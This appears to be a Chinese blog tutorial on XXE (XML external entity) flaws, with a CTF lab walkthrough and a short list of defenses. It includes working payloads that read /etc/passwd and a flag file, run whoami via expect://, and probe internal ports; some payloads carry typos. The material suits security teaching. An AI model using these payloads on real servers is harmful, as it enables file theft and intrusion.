xxe漏洞原理,简单复现及防御

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量1k 收藏 1
点赞数
文章标签: 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56513549/article/details/124110259
版权

xxe漏洞原理

  • Web应用的脚本代码没有限制XML引入外部实体,从而导致测试者可以创建一个包含外部实体的XML,使得其中的内容会被服务器端执行
  • 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害

xxe联系靶场

http://web.jarvisoj.com:9882/

复现步骤

打开代理进行抓包操作

明显看到使用的是json读取

 我们将包放进重发模块修改成xml读取方式

 读取flag包

<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///home/ctf/flag.txt"> ]> <x>&f;</x>

其他的执行未截图,感兴趣的可以试一试

执行系统命令

如果服务器环境中安装了某些特定的扩展,即可利用其造成任意命令执行,如攻击者构造如下的XML文档:

<?xml version="1.0" encoding-"utf-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "expect://whoami">]><x>&xxe;</x>

读取任意文件命令

如果攻击者可以控制服务器解析的XML文档的内容,引入攻击者想要读取的文件内容作为外部实体,即可尝试读取任意的文件内容。如攻击者构造如下的XML文档就会将/etc/passwd文件的内容引入进来并回显在页面中,造成敏感文件内容泄露。

<?xm1 version="1.0" encoding-"utf-8"?><!DOCTYPE ANY[<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>

探测内网接口

如果Web服务器的的执行环境在内网,则可以通过请求内网IP的某个端口来判断该IP 的相应端口是否开放,这可以通过直接引用外部实体的方式引入要访问该端口的链接即可实现:

<?xm1 version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [ 
   <!ENTITY xxe SYSTEM http://ip:80/mark
]>
<x>&xxe</x>
如果回显结果为“Connection Refused”,即可以判断该IP的80端口是开放的。

如何防御xxe漏洞

1.使用开发语言提供的禁用外部实体的方法

2.过滤用户提交的XML数据,过滤关键词

3.使用第三方应用代码及时升级补丁

派大星833
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
细节揭示:XXE漏洞复现步骤及安全防护建议
weixin_43263566的博客
08-31 287
XXE漏洞发生在那些使用XML解析器处理用户提供的XML输入的应用程序中。攻击者通过在用户输入的XML文档中插入恶意的实体引用,来触发XML解析器加载外部实体。这些外部实体可能指向本地文件系统或通过网络访问的远程资源。
WEB漏洞——XXE
qq_63594215的博客
04-12 847
本次文章主要介绍XXE漏洞原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
网络安全XXE漏洞复现防御(上篇)(技术进阶)
weixin_70911257的博客
04-16 1291
xxe漏洞复现
XXE漏洞安全-全网最详细讲解】
qq_44005305的博客
05-31 716
Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(externalentity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。其中最常见的一种攻击是利用DTD(Document Type。
1.7服务端漏洞——XXE漏洞原理
The code way of kinnisoy
07-07 594
XXE漏洞原理 1.XXE是什么 XXE全称是——XML External Entity,也就是XML外部实体注入攻击.漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。 xml实体注入就是利用了客户端返回xml提交数据时,注入远程调用xml实体的代码来实现一些想要的功能。 要想搞懂XXE,肯定要先了解XML语法规则和外部实体的定义及调用形式。 2.XML介绍 XML数据传输类型(同类:JSON 序列化) XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 语法规则: 1.所有的X
XXE漏洞复现实操
wutiangui的博客
10-13 888
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
XXE漏洞复现步骤
zxcvbnmasdflzl的博客
06-24 982
另外,一般来说,服务器解析XML有两种方式,一种是一次性将整个XML加载进内存中,进行解析;如果我们递归地调用XML定义,一次性调用巨量的定义,那么服务器的内存就会被消耗完,造成了拒绝服务攻击。既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML的时候就会把那个文件的内容赋值给SYSTEM前面的根元素中,只要我们在XML中让前面的根元素的内容显示出来,不就可以读取那个文件的内容了。3.检查所使用的底层xml解析库,默认禁止外部实体的解析。
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6603
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
xxe漏洞详解
good good study
03-03 5648
目录 一. XML 1. xml文档 2. XML元素 3. DTD 二. 漏洞描述 三. pikachu靶场之xxe 1. 任意文件读取 2. 命令执行 3. 源码分析 四. bwapp靶场之xxe 1. 利用DNSlog测试命令执行 2. 读取本地文件 ​ 这几天又开始漏洞复现了,抽空整理一下漏洞原理,正所谓温故而知新,学习这个漏洞之前我们得了解什么是XML、DTD 一. XML 1. xml文档 XML 指可扩展标记语言,相对于HTML被用来显示数据,XML被设计用来
【WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 855
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
**一、XXE漏洞原理** XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞的测试原理可以分为以下几个步骤: 首先,攻击者需要构造恶意的 XML 文档,该文档中包含外部实体的引用。然后,攻击者将该文档发送给服务器,并 trick 服务器将任意文件读取出来。最后,攻击者可以通过查看...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 413
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1053
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 290
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
xxe漏洞原理防御方式
05-25
XXE(XML External Entity)漏洞是一种常见的Web应用程序安全漏洞,攻击者利用这种漏洞可以读取本地文件、发起内部网络攻击等。XXE漏洞原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取本地文件等。 2.使用白名单:仅允许特定的实体和DTD(Document Type Definition)文件,不允许使用任意的实体和DTD文件。 3.过滤输入数据:在接收用户输入数据时,应该对输入数据进行过滤和检查,避免恶意实体被插入到XML文档中。 4.升级解析器:使用最新版本的XML解析器可以提高安全性,因为新版本通常会修复已知的漏洞。 5.使用WAF(Web应用程序防火墙):WAF可以检测并防止XXE漏洞攻击,建议在Web应用程序中使用WAF。 总之,XXE漏洞是一种常见的Web应用程序安全漏洞,开发人员应该注意防范和修复这种漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值